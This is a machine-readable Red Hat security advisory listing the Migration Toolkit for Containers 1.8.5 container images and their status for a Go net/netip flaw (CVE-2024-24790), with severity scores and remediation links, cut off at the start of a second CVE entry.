"title": "Red Hat Security Advisory: Migration Toolkit for Containers (MTC) 1.8.5 security and bug fix update",
"tracking": {
"current_release_date": "2025-12-02T08:25:27+00:00",
"generator": {
"date": "2025-12-02T08:25:27+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.6.13"
}
},
"id": "RHSA-2024:10906",
"initial_release_date": "2024-12-10T01:37:19+00:00",
"revision_history": [
{
"date": "2024-12-10T01:37:19+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-12-10T01:37:19+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-12-02T08:25:27+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "8Base-RHMTC-1.8",
"product": {
"name": "8Base-RHMTC-1.8",
"product_id": "8Base-RHMTC-1.8",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhmt:1.8::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat Migration Toolkit"
},
{
"branches": [
{
"category": "product_version",
"name": "rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"product": {
"name": "rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"product_id": "rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319?arch=amd64\u0026repository_url=registry.redhat.io/rhmtc/openshift-migration-controller-rhel8\u0026tag=v1.8.5-11"
}
}
},
{
"category": "product_version",
"name": "rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"product": {
"name": "rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"product_id": "rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc?arch=amd64\u0026repository_url=registry.redhat.io/rhmtc/openshift-migration-hook-runner-rhel8\u0026tag=v1.8.5-8"
}
}
},
{
"category": "product_version",
"name": "rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"product": {
"name": "rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"product_id": "rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed?arch=amd64\u0026repository_url=registry.redhat.io/rhmtc/openshift-migration-log-reader-rhel8\u0026tag=v1.8.5-8"
}
}
},
{
"category": "product_version",
"name": "rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"product": {
"name": "rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"product_id": "rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb?arch=amd64\u0026repository_url=registry.redhat.io/rhmtc/openshift-migration-must-gather-rhel8\u0026tag=v1.8.5-9"
}
}
},
{
"category": "product_version",
"name": "rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"product": {
"name": "rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"product_id": "rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf?arch=amd64\u0026repository_url=registry.redhat.io/rhmtc/openshift-migration-openvpn-rhel8\u0026tag=v1.8.5-6"
}
}
},
{
"category": "product_version",
"name": "rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"product": {
"name": "rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"product_id": "rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c?arch=amd64\u0026repository_url=registry.redhat.io/rhmtc/openshift-migration-rhel8-operator\u0026tag=v1.8.5-10"
}
}
},
{
"category": "product_version",
"name": "rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"product": {
"name": "rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"product_id": "rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb?arch=amd64\u0026repository_url=registry.redhat.io/rhmtc/openshift-migration-operator-bundle\u0026tag=v1.8.5-16"
}
}
},
{
"category": "product_version",
"name": "rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"product": {
"name": "rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"product_id": "rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007?arch=amd64\u0026repository_url=registry.redhat.io/rhmtc/openshift-migration-registry-rhel8\u0026tag=v1.8.5-6"
}
}
},
{
"category": "product_version",
"name": "rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"product": {
"name": "rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"product_id": "rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31?arch=amd64\u0026repository_url=registry.redhat.io/rhmtc/openshift-migration-rsync-transfer-rhel8\u0026tag=v1.8.5-7"
}
}
},
{
"category": "product_version",
"name": "rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"product": {
"name": "rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"product_id": "rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47?arch=amd64\u0026repository_url=registry.redhat.io/rhmtc/openshift-migration-ui-rhel8\u0026tag=v1.8.5-7"
}
}
},
{
"category": "product_version",
"name": "rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64",
"product": {
"name": "rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64",
"product_id": "rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b?arch=amd64\u0026repository_url=registry.redhat.io/rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8\u0026tag=v1.8.5-6"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64 as a component of 8Base-RHMTC-1.8",
"product_id": "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64"
},
"product_reference": "rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"relates_to_product_reference": "8Base-RHMTC-1.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64 as a component of 8Base-RHMTC-1.8",
"product_id": "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64"
},
"product_reference": "rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"relates_to_product_reference": "8Base-RHMTC-1.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64 as a component of 8Base-RHMTC-1.8",
"product_id": "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64"
},
"product_reference": "rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"relates_to_product_reference": "8Base-RHMTC-1.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64 as a component of 8Base-RHMTC-1.8",
"product_id": "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64"
},
"product_reference": "rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"relates_to_product_reference": "8Base-RHMTC-1.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64 as a component of 8Base-RHMTC-1.8",
"product_id": "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64"
},
"product_reference": "rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"relates_to_product_reference": "8Base-RHMTC-1.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64 as a component of 8Base-RHMTC-1.8",
"product_id": "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64"
},
"product_reference": "rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"relates_to_product_reference": "8Base-RHMTC-1.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64 as a component of 8Base-RHMTC-1.8",
"product_id": "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64"
},
"product_reference": "rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"relates_to_product_reference": "8Base-RHMTC-1.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64 as a component of 8Base-RHMTC-1.8",
"product_id": "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64"
},
"product_reference": "rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"relates_to_product_reference": "8Base-RHMTC-1.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64 as a component of 8Base-RHMTC-1.8",
"product_id": "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64"
},
"product_reference": "rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"relates_to_product_reference": "8Base-RHMTC-1.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64 as a component of 8Base-RHMTC-1.8",
"product_id": "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
},
"product_reference": "rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"relates_to_product_reference": "8Base-RHMTC-1.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64 as a component of 8Base-RHMTC-1.8",
"product_id": "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
},
"product_reference": "rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64",
"relates_to_product_reference": "8Base-RHMTC-1.8"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-24790",
"cwe": {
"id": "CWE-115",
"name": "Misinterpretation of Input"
},
"discovery_date": "2024-06-17T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2292787"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Go language standard library net/netip. The method Is*() (IsPrivate(), IsPublic(), etc) doesn\u0027t behave properly when working with IPv6 mapped to IPv4 addresses. The unexpected behavior can lead to integrity and confidentiality issues, specifically when these methods are used to control access to resources or data.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: net/netip: Unexpected behavior from Is methods for IPv4-mapped IPv6 addresses",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This CVE has been marked as moderate as for our products a network-based attack vector is simply impossible when it comes to golang code,apart from that as per CVE flaw analysis reported by golang, this only affects integrity and confidentiality and has no effect on availability, hence CVSS has been marked as such.\n\nWithin regulated environments, a combination of the following controls acts as a significant barrier to successfully exploiting a CWE-115: Misinterpretation of Input vulnerability and therefore downgrades the severity of this particular CVE from Moderate to Low.\n\nControls such as input validation and error handling mitigate input misinterpretation risks by enforcing strict validation rules and secure error management. Error handling ensures inputs are validated against predefined formats, preventing malformed data from being misinterpreted. Techniques like strong typing, allow listing, and proper encoding reduce the likelihood of injection attacks and unintended code execution. Input validation also ensures that errors do not expose sensitive system details or cause unpredictable behavior. Secure error handling prevents information leakage through detailed error messages while preserving system stability under malformed input conditions. Together, these controls reduce the attack surface by maintaining consistent input processing and preventing exploitable system states, strengthening the overall security posture.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
],
"known_not_affected": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-24790"
},
{
"category": "external",
"summary": "RHBZ#2292787",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2292787"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-24790",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24790"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-24790",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24790"
}
],
"release_date": "2024-06-04T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-12-10T01:37:19+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:10906"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: net/netip: Unexpected behavior from Is methods for IPv4-mapped IPv6 addresses"
},
{
"cve": "CVE-2024-24791",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2024-07-02T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
